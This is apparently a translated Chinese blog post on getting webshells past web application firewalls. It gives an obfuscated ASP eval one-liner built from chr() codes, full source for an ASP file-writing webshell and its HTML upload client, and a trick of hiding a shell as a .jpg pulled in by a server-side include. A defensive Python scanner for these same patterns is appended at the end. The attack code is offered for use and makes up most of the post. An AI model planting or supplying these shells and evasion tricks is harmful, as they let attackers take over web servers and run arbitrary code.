
Penetration testing - a detection-evading one-liner that gets past the firewall - cracer 哔哩哔哩

2023-07-16 13:13 Author: 鬼谷_卫庄

ASP detection-evading one-liner: <%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("a"))%>

A BS small shell that gets through the firewall


On servers running 8Signs Firewall, many PHP, ASP and ASPX small and large shells cannot be used, so a BS shell is recommended here...


The small shell's receiving end:


--------------------------------------


<%


On Error Resume Next


set gl=server.CreateObJeCt("Adodb.Stream") 


gl.Open 


gl.Type=2


gl.CharSet="gb2312" 


gl.writetext request("code")


gl.SaveToFile server.mappath(request("path")),2 


gl.Close 


set gl=nothing 


response.redirect request("path")


%>


-----------------------------------------------------


The small shell's sending end, aspshelluP.Html:


------------------------------------------------------


<html>


<head>


<meta http-equiv="Content-Type" content="text/html; charset=gb2312">


<title>Asp shell up Client</title>


</head>


<style>


BODY { FONT-SIZE: 9pt; COLOR: #000000; FONT-FAMILY: "Courier New"; scrollbar-face-color:#E4E4F3; scrollbar-highlight-color:#FFFFFF; scrollbar-3dlight-color:#E4E4F3; scrollbar-darkshadow-color:#9C9CD3; scrollbar-shadow-color:#E4E4F3; scrollbar-arrow-color:#4444B3; scrollbar-track-color:#EFEFEF;}TABLE { FONT-SIZE: 9pt; BORDER-COLLAPSE: collapse; border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-bottom-style: none; border-left-style: solid; border-top-color: #d8d8f0; border-right-color: #d8d8f0; border-bottom-color: #d8d8f0; border-left-color: #d8d8f0;}input { font-family: "Courier New"; BORDER-TOP-WIDTH: 1px; FONT-SIZE: 12px; BORDER-BOTTOM-WIDTH: 1px; BORDER-RIGHT-WIDTH: 1px;}textarea { font-family: "Courier New";}td { border-right-width: 1px; border-bottom-width: 1px; border-right-style: solid; border-bottom-style: solid; border-top-color: #d8d8f0;}.trHead { background-color: #e4e4f3; line-height: 3px;}.STYLE5 {font-family: Arial, Helvetica, sans-serif; font-size: 11pt;}


</style>


<body>


<table width="780" border="0" align="center" cellpadding="0" cellspacing="0">


<tr>


<td height="22" class="td" align="center" >&nbsp;<span class="STYLE5">Asp shell up Client </span> </td>


</tr>


<tr>


<td class="trHead">&nbsp;</td>


</tr>


<td align="center" class="td">&nbsp;</td>


<tr>


<td height="18" align="center" class="td">


<FORM method=post target=_blank>ShellUrl: <INPUT 


style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid" 


size=58 value=http://127.0.0.1/s.asp name=act> Path: <INPUT 


style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid" 


size=8 value="4.txt" name=path> <INPUT onClick="Javascipt:name=path.value;action=document.all.act.value;submit();" type=button value="Submit" name=Send><BR>


发送的webshell代码:  


<BR><TEXTAREA style="BORDER-RIGHT: 1px solid; BORDER-TOP: 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: 1px solid; BORDER-BOTTOM: 1px solid" name=code rows=20 cols=85></TEXTAREA>


</FORM>


</td>


</tr>


<tr>


<td align="right" class="td"> Powered By <a href="#" title="点击复制服务端到剪贴版" onclick='window.clipboardData.setData("text","\<%\nOn Error Resume Next\nset gl=server.CreateObJeCt(\"Adodb.Stream\") \ngl.Open \ngl.Type=2\ngl.CharSet=\"gb2312\" \ngl.writetext request(\"code\")\ngl.SaveToFile server.mappath(request(\"path\")),2 \ngl.Close \nset gl=nothing \nresponse.redirect request(\"path\")\n%\>");alert("\服务端已成功复制到剪贴")'>[Copy code]</a>&nbsp;4ngr7 &nbsp;&nbsp;</td>


</tr><tr><td class="trHead">&nbsp;</td></tr>


</table>


</body>


</html>

Another approach is to first rename the large shell you need to upload to xxx.jpg; some firewalls do not inspect images.

Then create a new ASP file whose content is <!--#include file="xxx.jpg" -->

After that, the file is successfully included!
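A defender-side static check for the three patterns shown on this page (the chr()-built eval, the writer whose SaveToFile path comes from the request, and the include of an image-named file), given as an added example that is not part of the original post. The rule names, function names and sample file names are assumptions chosen for illustration, and the samples are constructed from the snippets above.

```python
import re

# chr(n)+chr(n)... (or & concatenation) chains, the obfuscation used in the one-liner
CHR_CHAIN = re.compile(r'chr\(\s*\d+\s*\)(?:\s*[+&]\s*chr\(\s*\d+\s*\))+', re.I)
CHR_ONE = re.compile(r'chr\(\s*(\d+)\s*\)', re.I)

# Hypothetical rule names; each regex targets one pattern from the page.
RULES = {
    # eval/execute statement (not a method call such as conn.Execute) fed by Request
    "eval-of-request": re.compile(
        r'(?<![.\w])(?:eval|execute|executeglobal)\b[^\n%]*\brequest\b', re.I),
    # file written to a path taken straight from the request
    "request-controlled-savetofile": re.compile(
        r'\bsavetofile\b[^\n]*\brequest\s*\(', re.I),
    # server-side include of a file with a non-script extension
    "include-of-non-script-file": re.compile(
        r'<!--\s*#include\s+(?:file|virtual)\s*=\s*"[^"]+\.(?:jpe?g|gif|png|bmp|txt)"', re.I),
}

def fold_chr_chains(src):
    """Replace each chr() chain with the quoted string literal it evaluates to."""
    def fold(match):
        codes = CHR_ONE.findall(match.group(0))
        return '"' + ''.join(chr(int(c)) for c in codes) + '"'
    return CHR_CHAIN.sub(fold, src)

def scan(src, normalise=True):
    """Return the sorted names of the rules that match the ASP source text."""
    text = fold_chr_chains(src) if normalise else src
    return sorted(name for name, rx in RULES.items() if rx.search(text))

# Constructed samples, built from the three snippets shown on this page.
SAMPLES = {
    "one_liner.asp": '<%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)'
                     '+chr(101)+chr(115)+chr(116))("a"))%>',
    "receiver.asp": 'gl.writetext request("code")\n'
                    'gl.SaveToFile server.mappath(request("path")),2',
    "wrapper.asp": '<!--#include file="xxx.jpg" -->',
    "benign.asp": '<%\nResponse.Write Server.HTMLEncode(Request("q"))\n%>\n'
                  '<!--#include file="header.asp" -->',
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, scan(body) or "clean")
```

Calling `scan(..., normalise=False)` on the one-liner returns no hits, which is why a keyword filter that reads only the raw text misses it.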

